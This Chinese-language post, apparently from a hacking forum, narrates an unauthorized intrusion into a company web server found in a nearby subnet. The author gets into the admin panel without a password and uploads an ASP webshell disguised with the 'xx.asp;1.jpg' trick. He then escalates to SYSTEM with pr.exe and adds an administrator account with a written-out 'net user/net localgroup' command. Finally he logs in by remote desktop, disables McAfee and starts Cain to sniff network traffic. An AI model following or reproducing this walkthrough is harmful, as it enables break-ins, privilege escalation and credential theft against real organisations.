拿C段
看见了个很接近的C段并且是一个公司一般的企业的都挺好日的
218.x.241.134的第一个企业站点习惯性的在后面加了个admin
找到后台登陆进去
这个分店选择看见了系统管理组
登陆进去后台是这个样的
果断manager点击登陆竟然不需要密码就进去了找到后台上传地方
果断xx.asp;1.jpg
进入上传成功人品真不是盖的!
复制图片地址
果断进去webshell
习惯性的看下组建
支持ws
果断找可写目录
发现可写目录用菜刀吧cmd.exe和pr.exe上传到这个可写可读目录
执行命令
Pr可以提权溢出返回的是system权限添加个账户
C:\wmpub\wmiislog\pr.exe "net userxxoo ooxx /add & net localgroup administrators xxoo /add"执行命令添加用户显示成功因为已经添加好了我就不在添加了
读取一些注册表3389的端口显示3366
果断登陆
输入账户和密码成功登陆进去
登陆进去看见服务器有麦咖啡
服务关掉不然我下载啥玩意都得被杀掉
吧Cain下载好打开
配置选网卡
端口选择
激活嗅探器然后扫描一下Mac地址
然后点击确定
添加一下
选择一下要嗅探的主机
点击开始
坐等数据吧!
